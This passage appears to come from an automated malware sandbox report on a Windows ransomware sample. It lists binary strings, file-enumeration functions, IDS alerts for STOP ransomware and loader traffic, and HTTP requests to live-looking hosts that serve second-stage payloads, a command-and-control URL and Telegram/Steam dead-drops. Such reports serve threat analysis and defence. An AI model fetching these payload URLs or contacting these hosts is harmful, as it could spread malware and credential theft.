9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2360091492.0000000003C8E000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2282440855.0000000003C7B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2273727258.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323157191.0000000003C87000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316085239.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316719842.0000000003C79000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196da
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\les\j source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2341959833.0000000003B24000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2348441168.0000000003B2B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2342176452.0000000003B27000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\%; source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2332585421.0000000004035000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ngs\ source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323506783.0000000003F3B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323100107.0000000003F23000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2314739889.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\PS source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA0160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_00B9FB98
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EF730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_002EF730
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F0160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_002F0160
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EFB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_002EFB98
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA0160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00B9FB98
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00411A10 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00411A10
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041C260 wsprintfA,FindFirstFileA,memset,lstrcat,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,strtok_s,strtok_s,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,5_2_0041C260
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040F200 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0040F200
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041D400 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0041D400
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00401600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_00401600
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040F8B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,5_2_0040F8B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041CBA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_0041CBA0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040EDB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040EDB0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041CFF0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,5_2_0041CFF0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0041C6B0 strtok_s,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,strtok_s,5_2_0041C6B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]4_2_005B1D60
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax4_2_005B1D60
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]5_2_004013C0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax5_2_004013C0

                Networking

                Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49732 -> 175.120.254.9:80
                Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49734 -> 186.147.159.149:80
                Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49734 -> 186.147.159.149:80
                Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49735 -> 175.120.254.9:80
                Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49735 -> 175.120.254.9:80
                Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49740 -> 175.120.254.9:80
                Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49746 -> 175.120.254.9:80
                Source: Malware configuration extractor URLs: http://zexeq.com/test1/get.php
                Source: global traffic TCP traffic: 192.168.2.4:49737 -> 116.202.0.196:10220
                Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 12 Jan 2024 05:48:01 GMT Content-Type: application/octet-stream Content-Length: 367104 Last-Modified: Wed, 10 Jan 2024 12:50:02 GMT Connection: close ETag: "659e927a-59a00" Accept-Ranges: bytes
                Source: global traffic HTTP traffic detected: GET /bg3goty HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
                Source: Joe Sandbox View IP Address: 172.67.139.220
                Source: Joe Sandbox View IP Address: 186.147.159.149
                Source: Joe Sandbox View ASN Name: TelmexColombiaSACO
                Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknown TCP traffic detected without corresponding DNS query: 116.202.0.196
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00B9CF10
                Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
                Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
                Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
                Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: brusuax.com
                Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960830157.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1960992535.0000000003710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000003.1961052135.0000000003710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: unknownDNS traffic detected: queries for: api.2ip.ua
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 
00000003.00000003.2050797457.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brusuax.com/dl/build2.exe
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://brusuax.com/dl/build2.exe$run
                Source: build2.exe, 00000005.00000003.1767476575.0000000003111000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1766756030.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                Source: build2.exe, 00000005.00000003.1767476575.0000000003111000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1766756030.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/)
                Source: build2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: build2.exe, 00000005.00000002.2906708317.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
00000003.00000003.2310805053.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/m
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
                Source: 27160079615.ttf.3.dr, 30264859306.ttf.3.drString found in binary or memory: https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1965169628.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
                Source: build2.exe, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199601319247
                Source: build2.exe, 00000004.00000002.1746811834.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199601319247helloWFQY12O5J6Nr.$v
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1885029098.000000000993F000.00000004.00000020.00020000.00000000.sdmp, CFIJEBFC.5.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: CFIJEBFC.5.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016dfb6b41c
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016stry
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1885029098.000000000993F000.00000004.00000020.00020000.00000000.sdmp, CFIJEBFC.5.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: CFIJEBFC.5.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17exe
                Source: build2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17lsass.exe
                Source: build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/R
                Source: build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/X
                Source: build2.exe, build2.exe, 00000005.00000003.1757338851.0000000000707000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1761711500.000000000070E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1757407833.0000000000715000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3goty
                Source: build2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3gotyH
                Source: build2.exe, 00000005.00000003.1761763513.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.00000000006DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3gotyQ
                Source: build2.exe, 00000004.00000002.1746811834.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3gotymedvsMozilla/5.0
